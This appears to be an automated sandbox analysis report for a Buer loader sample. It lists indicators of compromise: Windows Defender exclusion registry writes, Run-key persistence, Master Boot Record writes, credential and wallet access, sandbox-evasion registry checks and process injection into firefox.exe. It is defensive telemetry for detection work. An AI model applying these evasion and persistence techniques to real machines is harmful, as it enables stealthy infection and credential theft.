buer | cecdc8bd4344647b2182696cf04e1db4fbb29aee6b46811999008901910b5c19

Processes:

2C35.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0"	2C35.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0"	2C35.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0"	2C35.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0"	2C35.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\wup = "0"	2C35.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Roaming\LateWave = "0"	2C35.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0"	2C35.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\2C35.exe = "0"	2C35.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows = "0"	2C35.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0"	2C35.exe

Accesses 2FA software files, possible credential harvesting 2 TTPs
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

Processes:

EA81.exe201E.exekkkk.exe2C35.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\4c8c8c43-19ca-469f-a92f-e9d42db7d04a\\EA81.exe\" --AutoStart"	EA81.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\haleng = "C:\\Users\\Admin\\AppData\\Local\\Temp\\haleng.e"	201E.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Internet Explorer\\Haetetutaefu.exe\""	kkkk.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run\LateWave = "\"C:\\Windows\\rss\\csrss.exe\""	2C35.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Checks whether UAC is enabled 1 TTPs 1 IoCs
evasion trojan

System Information Discovery
T1082

Processes:

1668.exe

description ioc process

Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 1668.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	1668.exe

Enumerates connected drives 3 TTPs 48 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

Processes:

msiexec.exemsiexec.exe

description	ioc	process
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\F:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\F:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 12 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow	ioc
373	checkip.amazonaws.com
445	ipinfo.io
512	ipinfo.io
609	ipinfo.io
657	ipinfo.io
555	ipinfo.io
653	ipinfo.io
228	api.2ip.ua
229	api.2ip.ua
239	api.2ip.ua
268	ip-api.com
443	ipinfo.io

Writes to the Master Boot Record (MBR) 1 TTPs 4 IoCs

Bootkits write to the MBR to gain persistence at a level below the operating system.

bootkit persistence

Bootkit

T1067

Processes:

Setup.exeC0CA61A12E4C8B38.exeC0CA61A12E4C8B38.exeMiniThunderPlatform.exe

description	ioc	process
File opened for modification	\??\PhysicalDrive0	Setup.exe
File opened for modification	\??\PhysicalDrive0	C0CA61A12E4C8B38.exe
File opened for modification	\??\PhysicalDrive0	C0CA61A12E4C8B38.exe
File opened for modification	\??\PhysicalDrive0	MiniThunderPlatform.exe

Drops file in System32 directory 1 IoCs

Processes:

svchost.exe

description ioc process

File created C:\Windows\SysWOW64\config\systemprofile:.repos svchost.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

Processes:

Setup.exe

pid process

3996 Setup.exe

description	ioc	process
File created	C:\Windows\SysWOW64\config\systemprofile:.repos	svchost.exe

pid	process
3996	Setup.exe

Suspicious use of SetThreadContext 6 IoCs

Processes:

C0CA61A12E4C8B38.exe17FF.exevuikyvwo.exeprivacytools5.exe

description	pid	process	target process
PID 1592 set thread context of 3396	1592	C0CA61A12E4C8B38.exe	firefox.exe
PID 1592 set thread context of 2596	1592	C0CA61A12E4C8B38.exe	firefox.exe
PID 1592 set thread context of 2496	1592	C0CA61A12E4C8B38.exe	firefox.exe
PID 5060 set thread context of 4996	5060	17FF.exe	17FF.exe
PID 3200 set thread context of 3500	3200	vuikyvwo.exe	svchost.exe
PID 5980 set thread context of 5156	5980	privacytools5.exe	privacytools5.exe

Drops file in Program Files directory 61 IoCs

Processes:

23E04C4F32EF2158.tmpseed.sfx.exeprolab.tmpkkkk.exe

description	ioc	process
File created	C:\Program Files (x86)\DTS\is-65OKB.tmp	23E04C4F32EF2158.tmp
File created	C:\Program Files (x86)\DTS\is-362A6.tmp	23E04C4F32EF2158.tmp
File created	C:\Program Files (x86)\DTS\is-VC5JC.tmp	23E04C4F32EF2158.tmp
File created	C:\Program Files (x86)\Seed Trade\Seed\__tmp_rar_sfx_access_check_259552734	seed.sfx.exe
File opened for modification	C:\Program Files (x86)\Picture Lab\AForge.Imaging.dll	prolab.tmp
File created	C:\Program Files (x86)\DTS\is-OA5PR.tmp	23E04C4F32EF2158.tmp
File created	C:\Program Files (x86)\DTS\images\is-SDJDT.tmp	23E04C4F32EF2158.tmp
File opened for modification	C:\Program Files (x86)\Picture Lab\WeifenLuo.WinFormsUI.dll	prolab.tmp
File created	C:\Program Files (x86)\Picture Lab\is-8GMOI.tmp	prolab.tmp
File created	C:\Program Files (x86)\Picture Lab\is-6JPTO.tmp	prolab.tmp
File created	C:\Program Files (x86)\DTS\images\is-BM54V.tmp	23E04C4F32EF2158.tmp
File opened for modification	C:\Program Files (x86)\Picture Lab\SourceLibrary.dll	prolab.tmp
File created	C:\Program Files (x86)\DTS\images\is-368LK.tmp	23E04C4F32EF2158.tmp
File created	C:\Program Files (x86)\DTS\images\is-SV01A.tmp	23E04C4F32EF2158.tmp
File created	C:\Program Files (x86)\DTS\images\is-AP1UH.tmp	23E04C4F32EF2158.tmp
File opened for modification	C:\Program Files (x86)\DTS\unins000.dat	23E04C4F32EF2158.tmp
File created	C:\Program Files\Windows NT\GLZYMDQSUS\prolab.exe	kkkk.exe
File created	C:\Program Files (x86)\DTS\is-3R7FB.tmp	23E04C4F32EF2158.tmp
File created	C:\Program Files (x86)\DTS\images\is-SK5FU.tmp	23E04C4F32EF2158.tmp
File created	C:\Program Files (x86)\DTS\is-40DMS.tmp	23E04C4F32EF2158.tmp
File opened for modification	C:\Program Files (x86)\Picture Lab\DockingToolbar.dll	prolab.tmp
File created	C:\Program Files (x86)\Picture Lab\is-QCQE5.tmp	prolab.tmp
File created	C:\Program Files\Windows NT\GLZYMDQSUS\prolab.exe.config	kkkk.exe
File opened for modification	C:\Program Files (x86)\Picture Lab\AForge.Math.dll	prolab.tmp
File opened for modification	C:\Program Files (x86)\DTS\seed.sfx.exe	23E04C4F32EF2158.tmp
File created	C:\Program Files (x86)\DTS\is-5TA6B.tmp	23E04C4F32EF2158.tmp
File opened for modification	C:\Program Files (x86)\Picture Lab\SourceGrid2.dll	prolab.tmp
File created	C:\Program Files (x86)\DTS\images\is-GMJOU.tmp	23E04C4F32EF2158.tmp
File created	C:\Program Files (x86)\DTS\images\is-BMPT6.tmp	23E04C4F32EF2158.tmp
File created	C:\Program Files (x86)\DTS\images\is-R469U.tmp	23E04C4F32EF2158.tmp
File opened for modification	C:\Program Files (x86)\Seed Trade\Seed	seed.sfx.exe
File created	C:\Program Files (x86)\Internet Explorer\Haetetutaefu.exe	kkkk.exe
File created	C:\Program Files (x86)\DTS\images\is-R449S.tmp	23E04C4F32EF2158.tmp
File created	C:\Program Files (x86)\DTS\lang\is-IEETH.tmp	23E04C4F32EF2158.tmp
File created	C:\Program Files (x86)\DTS\lang\is-638KS.tmp	23E04C4F32EF2158.tmp
File opened for modification	C:\Program Files (x86)\Seed Trade	seed.sfx.exe
File opened for modification	C:\Program Files (x86)\Picture Lab\unins000.dat	prolab.tmp
File created	C:\Program Files (x86)\DTS\unins000.dat	23E04C4F32EF2158.tmp
File created	C:\Program Files (x86)\DTS\is-PLJ4B.tmp	23E04C4F32EF2158.tmp
File created	C:\Program Files (x86)\DTS\images\is-1TP1C.tmp	23E04C4F32EF2158.tmp
File created	C:\Program Files (x86)\DTS\images\is-M1DDD.tmp	23E04C4F32EF2158.tmp
File opened for modification	C:\Program Files (x86)\Picture Lab\AForge.dll	prolab.tmp
File created	C:\Program Files (x86)\DTS\images\is-3DJSQ.tmp	23E04C4F32EF2158.tmp
File created	C:\Program Files (x86)\DTS\images\is-GILGG.tmp	23E04C4F32EF2158.tmp
File created	C:\Program Files (x86)\Picture Lab\is-T8C0A.tmp	prolab.tmp
File created	C:\Program Files (x86)\DTS\is-V8OAK.tmp	23E04C4F32EF2158.tmp
File created	C:\Program Files (x86)\DTS\is-Q13HJ.tmp	23E04C4F32EF2158.tmp
File created	C:\Program Files (x86)\Picture Lab\unins000.dat	prolab.tmp
File created	C:\Program Files (x86)\Picture Lab\is-RBR90.tmp	prolab.tmp
File opened for modification	C:\Program Files (x86)\Picture Lab\Pictures Lab.exe	prolab.tmp
File created	C:\Program Files (x86)\Picture Lab\is-5VNVG.tmp	prolab.tmp
File created	C:\Program Files (x86)\Picture Lab\is-3ODEL.tmp	prolab.tmp
File created	C:\Program Files (x86)\Picture Lab\is-D8NRV.tmp	prolab.tmp
File created	C:\Program Files (x86)\Internet Explorer\Haetetutaefu.exe.config	kkkk.exe
File created	C:\Program Files (x86)\Picture Lab\is-T5OQ7.tmp	prolab.tmp
File created	C:\Program Files (x86)\Picture Lab\is-2HB2N.tmp	prolab.tmp
File opened for modification	C:\Program Files (x86)\DTS\DreamTrip.exe	23E04C4F32EF2158.tmp
File created	C:\Program Files (x86)\DTS\images\is-PH86O.tmp	23E04C4F32EF2158.tmp
File created	C:\Program Files (x86)\DTS\images\is-PAA2O.tmp	23E04C4F32EF2158.tmp
File created	C:\Program Files (x86)\Seed Trade\Seed\seed.exe	seed.sfx.exe
File opened for modification	C:\Program Files (x86)\Seed Trade\Seed\seed.exe	seed.sfx.exe

Drops file in Windows directory 3 IoCs

Processes:

MicrosoftEdge.exe2C35.exe

description	ioc	process
File opened for modification	C:\Windows\Debug\ESE.TXT	MicrosoftEdge.exe
File opened for modification	C:\Windows\rss	2C35.exe
File created	C:\Windows\rss\csrss.exe	2C35.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 57 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
4968	3832	WerFault.exe	2C35.exe
5072	3832	WerFault.exe	2C35.exe
3156	3832	WerFault.exe	2C35.exe
5104	3832	WerFault.exe	2C35.exe
2176	3832	WerFault.exe	2C35.exe
1268	3832	WerFault.exe	2C35.exe
348	3832	WerFault.exe	2C35.exe
2004	3832	WerFault.exe	2C35.exe
3340	3832	WerFault.exe	2C35.exe
3816	3832	WerFault.exe	2C35.exe
4796	3832	WerFault.exe	2C35.exe
1348	3832	WerFault.exe	2C35.exe
4468	3832	WerFault.exe	2C35.exe
5032	3832	WerFault.exe	2C35.exe
4320	3832	WerFault.exe	2C35.exe
4184	3832	WerFault.exe	2C35.exe
4092	3832	WerFault.exe	2C35.exe
2832	3832	WerFault.exe	2C35.exe
4664	3832	WerFault.exe	2C35.exe
2984	1836	WerFault.exe	2C35.exe
5008	1836	WerFault.exe	2C35.exe
4584	1836	WerFault.exe	2C35.exe
4052	1836	WerFault.exe	2C35.exe
4712	1836	WerFault.exe	2C35.exe
2360	1836	WerFault.exe	2C35.exe
2828	1836	WerFault.exe	2C35.exe
4368	1836	WerFault.exe	2C35.exe
4948	1836	WerFault.exe	2C35.exe
2588	1836	WerFault.exe	2C35.exe
3224	1836	WerFault.exe	2C35.exe
5612	5372	WerFault.exe	csrss.exe
5704	5372	WerFault.exe	csrss.exe
5760	5372	WerFault.exe	csrss.exe
5920	5372	WerFault.exe	csrss.exe
6012	5372	WerFault.exe	csrss.exe
6080	5372	WerFault.exe	csrss.exe
6132	5372	WerFault.exe	csrss.exe
4276	5372	WerFault.exe	csrss.exe
4280	5372	WerFault.exe	csrss.exe
5304	5372	WerFault.exe	csrss.exe
5412	5372	WerFault.exe	csrss.exe
5752	5372	WerFault.exe	csrss.exe
5520	5372	WerFault.exe	csrss.exe
5636	5372	WerFault.exe	csrss.exe
5696	5372	WerFault.exe	csrss.exe
5796	5372	WerFault.exe	csrss.exe
6000	5372	WerFault.exe	csrss.exe
4912	5372	WerFault.exe	csrss.exe
4860	5372	WerFault.exe	csrss.exe
4812	1156	WerFault.exe	wslw5ru1oip.exe
4292	1156	WerFault.exe	wslw5ru1oip.exe
6676	1156	WerFault.exe	wslw5ru1oip.exe
7144	1156	WerFault.exe	wslw5ru1oip.exe
4508	1156	WerFault.exe	wslw5ru1oip.exe
5668	1156	WerFault.exe	wslw5ru1oip.exe
6932	1156	WerFault.exe	wslw5ru1oip.exe
7632	6408	WerFault.exe	28DE.tmp.exe

Checks SCSI registry key(s) 3 TTPs 24 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

Processes:

C0CA61A12E4C8B38.exeC0CA61A12E4C8B38.exeseed.exeprivacytools5.exe17FF.exe3733.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\FriendlyName	C0CA61A12E4C8B38.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\FriendlyName	C0CA61A12E4C8B38.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\DeviceDesc	C0CA61A12E4C8B38.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	seed.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	privacytools5.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&37CE57BA&0&010000	C0CA61A12E4C8B38.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\DeviceDesc	C0CA61A12E4C8B38.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&37CE57BA&0&000000	C0CA61A12E4C8B38.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\DeviceDesc	C0CA61A12E4C8B38.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\FriendlyName	C0CA61A12E4C8B38.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	seed.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	17FF.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	3733.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&37CE57BA&0&010000	C0CA61A12E4C8B38.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	privacytools5.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\FriendlyName	C0CA61A12E4C8B38.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&37CE57BA&0&000000	C0CA61A12E4C8B38.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	seed.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	17FF.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	3733.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	privacytools5.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\DeviceDesc	C0CA61A12E4C8B38.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	3733.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	17FF.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

Processes:

5.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	5.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	5.exe

Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exe

pid process

5364 schtasks.exe
5452 schtasks.exe
Delays execution with timeout.exe 3 IoCs
evasion

Processes:

timeout.exetimeout.exetimeout.exe

pid process

4016 timeout.exe
3336 timeout.exe
5740 timeout.exe
Kills process with taskkill 7 IoCs
evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exeTASKKILL.exetaskkill.exe

pid process

5940 taskkill.exe
2772 taskkill.exe
2308 taskkill.exe
3096 taskkill.exe
6500 taskkill.exe
5176 TASKKILL.exe
7380 taskkill.exe

pid	process
5364	schtasks.exe
5452	schtasks.exe

pid	process
4016	timeout.exe
3336	timeout.exe
5740	timeout.exe

pid	process
5940	taskkill.exe
2772	taskkill.exe
2308	taskkill.exe
3096	taskkill.exe
6500	taskkill.exe
5176	TASKKILL.exe
7380	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 3 IoCs

adware spyware

Modify Registry

Processes:

MicrosoftEdge.exebrowser_broker.exeMicrosoftEdgeCP.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\Main	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\Main	browser_broker.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\Main	MicrosoftEdgeCP.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

csrss.exenetsh.exesvchost.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-571 = "China Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-412 = "E. Africa Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-621 = "Korea Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-911 = "Mauritius Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-791 = "SA Western Daylight Time"	csrss.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-511 = "Central Asia Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2391 = "Aleutian Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2162 = "Altai Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2002 = "Cabo Verde Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2532 = "Chatham Islands Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1722 = "Libya Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-385 = "Namibia Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-561 = "SE Asia Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2392 = "Aleutian Standard Time"	csrss.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-41 = "E. South America Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-771 = "Montevideo Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2451 = "Saint Pierre Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-461 = "Afghanistan Daylight Time"	csrss.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-252 = "Dateline Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1971 = "Belarus Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-232 = "Hawaiian Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-92 = "Pacific SA Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-131 = "US Eastern Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-222 = "Alaskan Standard Time"	csrss.exe
Key created	\REGISTRY\USER\.DEFAULT\System\CurrentControlSet	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2321 = "Sakhalin Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-12 = "Azores Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-435 = "Georgian Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1862 = "Russia TZ 6 Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-331 = "E. Europe Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-661 = "Cen. Australia Daylight Time"	csrss.exe
